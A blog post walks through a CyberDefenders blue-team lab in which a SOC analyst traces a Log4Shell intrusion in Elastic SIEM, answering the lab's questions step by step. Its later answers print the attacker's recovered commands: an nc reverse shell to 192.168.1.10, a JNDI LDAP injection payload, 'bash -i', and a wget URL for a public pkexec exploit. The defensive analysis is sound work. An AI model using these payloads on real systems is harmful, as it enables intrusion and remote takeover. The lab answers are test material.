Post

CyberDefender Elastic-Case

Posted Updated
By Kenneth Hernandez 4 min read

CyberDefenders is a platform that is used for BlueTeam Training. The Elastic-Case Lab, now expired, shows how a Log4Shell exploit can be seen through the Elastic SIEM. This vulnerability has been out for a few years now, but it is still seen being exploited in the wild. On December 11, 2023 it was reported by BleepingComputer that the Lazarus group had released a new RAT using this exploit. BleepingComputer also wrote that roughly 38% of applications using the Apache Log4j library are using a vulnerable version.

Scenario:

An attacker was able to trick an employee into downloading a suspicious file and running it. The attacker compromised the system, along with that, The Security Team did not update most systems. The attacker was able to pivot to another system and compromise the company. As a SOC analyst, you are assigned to investigate the incident using Elastic as a SIEM tool and help the team to kick out the attacker.

What is Log4j and Log4Shell?

  • Log4j is a Java-based logging utility. Log4Shell(CVE-2021-44228) is a vulnerability in Log4j which allowed for remote code execution.

IBM Log4Shell Explanation

1. Who downloads the malicious file which has a double extension?

For this problem, I checked the Alerts tab of the security section in Kibana. I filtered by the “Malware Detection Alert” rule and found ahmed to be the user that downloaded the malicious file.

2. What is the hostname he was using?

Clicking view details on the initial download alert, DESKTOP-Q1SL9P2 is the hostname that was used.

3. What is the name of the malicious file?

The malicious file name, as shown in the details section, is ‘Acount_details.pdf.exe’ .

4. What is the attacker’s IP address?

Using the Analyze Event feature in Kibana, the 11 network events for ‘Acount_details.pdf.exe’ show that the IP Address is 192.168.1.10.

5. Another user with high privilege runs the same malicious file. What is the username?

Returning to the Alerts tab, it is shown that the other user to run the malicious file is cybery.

6. The attacker was able to upload a DLL file of size 8704. What is the file name?

Given the provided details, a query can be used to find the file. “file.extension: “dll” and file.size: 8704”. This results in the two alerts showing the mCblHDgWP.dll file.

7. What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

Using the Analyze Event feature on the .dll file, a process “rundll32.exe” is shown spawning two cmd processes, one of which being the cmd with NT AUTHORITY and pid 10716.

8. The previous process was able to access a registry. What is the full path of the registry?

Selecting the registry section of the rundll32.exe process shows the full path to be HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled.

9. PowerShell process with pid 8836 changed a file in the system. What was that filename?

While analyzing the event, checking the file activity for powershell.exe shows that there was a file change to ‘ModuleAnalysisCache’.

10. PowerShell process with pid 11676 created files with the ps1 extension. What is the file that has been created?

Looking at the other PowerShell process, it shows the file created was __PSScriptPolicyTest_bymwxuft.3b5.ps1

11. What is the machine’s IP address that is in the same LAN as a windows machine?

The query ‘host.ip: 192.168.10.0/24’ shows the other machine to ubuntu, with the given ip address being 192.168.10.30

12. The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

Looking at the hosts authentications in the security section, there are signs of a potential brute-force attack with 94 success authentications and 520 failed. The account that was successfully brute-forced was salem.

13. After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

Using the query ‘process.args: “wget” and user.name: “salem” shows that URL to be https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

14. After the attacker runs the exploit, which spawns a new process caled pkexec, what is the process’s md5 hash?

3a4ad518e9e404a6bad3d39dfebaf2f6

15. Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

bash -i

16. What is the hostname which alert signal.rule.name: “Netcat Network Activity”?

CentOS

17. What is the username who ran netcat?

solr

18. What is the parent process name of netcat?

java

19. If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

nc -e /bin/bash 192.168.1.10 9999

20. From the previous three questions, you may remember a famous java vulnerability. What is it?

A quick search shows the vulnerability is Log4Shell.

21. What is the entire log file path of the “solr” application?

/var/solr/logs/solr.log

22. What is the path that is vulnerable to log4j?

/admin/cores

23. What is the GET request parameter used to deliver log4j payload?

foo

24. What is the JNDI payload that is connected to the LDAP port?

{foo=${jndi:ldap://192.168.1.10:1389/Exploit}}

Blogs, Incident Response
CyberDefender Incident Response
This post is licensed under CC BY 4.0 by the author.